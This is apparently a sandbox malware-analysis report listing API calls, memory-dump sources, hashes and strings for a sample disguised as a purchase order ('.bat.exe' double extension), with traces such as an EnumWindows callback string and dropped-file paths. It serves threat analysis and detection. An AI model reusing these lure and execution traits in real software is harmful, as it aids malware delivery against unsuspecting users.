                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                      • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                                      • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                      • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 6FBB2C57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: db77d9aaa293a4cbb36dd5ecb787e82c6a18e21e115422334b72b69855ebf8a4
                                                                      • Instruction ID: 8978e1ef2174ffc7e75f502edd21f957ac9738ef0e10a23599b2d1347ad40698
                                                                      • Opcode Fuzzy Hash: db77d9aaa293a4cbb36dd5ecb787e82c6a18e21e115422334b72b69855ebf8a4
                                                                      • Instruction Fuzzy Hash: 0341A375504784DFCF269F69F985BAD3774EF05368F60842EE804CB184DF38A4928B96
                                                                      APIs
                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                        • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                        • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                        • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
                                                                        • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2972824698-0
                                                                      • Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                      • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                                      • Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                      • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000040,?,6FBB12DB,?,6FBB137F,00000019,6FBB11CA,-000000A0), ref: 6FBB12C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: 5007f4cd91aef3f8a8999f0650f58cf612c055ede7e1751fa6ed9e6132b08a52
                                                                      • Instruction ID: fd7e7e0602f994df3debb14dc7b79c6466c07fbf320823bcf0b5b2c641791e49
                                                                      • Opcode Fuzzy Hash: 5007f4cd91aef3f8a8999f0650f58cf612c055ede7e1751fa6ed9e6132b08a52
                                                                      • Instruction Fuzzy Hash: BAB01270600400DFEE008F19DC1AF343254F701310F840000B600C3140C92088218529
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                                      • GetClientRect.USER32(?,?), ref: 004058F0
                                                                      • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405993
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                                        • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A1B
                                                                      • ShowWindow.USER32(00000000), ref: 00405A3F
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                                      • ShowWindow.USER32(00000008), ref: 00405A8E
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                                      • CreatePopupMenu.USER32 ref: 00405AD3
                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                                      • GetWindowRect.USER32(?,?), ref: 00405B07
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                                      • OpenClipboard.USER32(00000000), ref: 00405B68
                                                                      • EmptyClipboard.USER32 ref: 00405B6E
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                                      • CloseClipboard.USER32 ref: 00405BC9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: H/B${
                                                                      • API String ID: 590372296-332483393
                                                                      • Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                      • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                                      • Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                      • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                                      • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404C65
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                                        • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                                        • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                                        • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                        • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                                        • Part of subcall function 00406930: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                                      • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
                                                                        • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                        • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                                        • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
                                                                      • API String ID: 2624150263-2177096811
                                                                      • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                      • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                                      • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                      • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                                      APIs
                                                                        • Part of subcall function 6FBB12BB: GlobalAlloc.KERNELBASE(00000040,?,6FBB12DB,?,6FBB137F,00000019,6FBB11CA,-000000A0), ref: 6FBB12C5
                                                                      • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FBB1D2D
                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 6FBB1D75
                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 6FBB1D7F
                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FBB1D92
                                                                      • GlobalFree.KERNEL32(?), ref: 6FBB1E74
                                                                      • GlobalFree.KERNEL32(?), ref: 6FBB1E79
                                                                      • GlobalFree.KERNEL32(?), ref: 6FBB1E7E
                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FBB2068
                                                                      • lstrcpyW.KERNEL32(?,?), ref: 6FBB2222
                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 6FBB22A1
                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 6FBB22B2
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 6FBB230C
                                                                      • lstrlenW.KERNEL32(00000808), ref: 6FBB2326
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                      • String ID:
                                                                      • API String ID: 245916457-0
                                                                      • Opcode ID: d10043141d622006c68652e239c87ae00a7c1078de2a55857d85cf53aaacb88b
                                                                      • Instruction ID: 9fdd6ec4b013ad2f53b923010a698ee2fe103ef073d2d764207cef5162efab12
                                                                      • Opcode Fuzzy Hash: d10043141d622006c68652e239c87ae00a7c1078de2a55857d85cf53aaacb88b
                                                                      • Instruction Fuzzy Hash: F122AA71D0468ADEDB11CFA8E5842FEB7B0FF0A315F54462ED1A5E6280DF70AA81CB50
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                      Strings
                                                                      • C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120, xrefs: 0040226E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID: C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120
                                                                      • API String ID: 542301482-909305818
                                                                      • Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                      • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                                      • Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                                      • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                      • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                                      • Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                                      • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                                      • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                                      • DeleteObject.GDI32(00000000), ref: 00405168
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                                        • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
                                                                      • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00405498
                                                                      • GlobalFree.KERNEL32(?), ref: 004054A8
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405604
                                                                      • ShowWindow.USER32(?,00000000), ref: 00405652
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                                      • ShowWindow.USER32(00000000), ref: 00405664
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
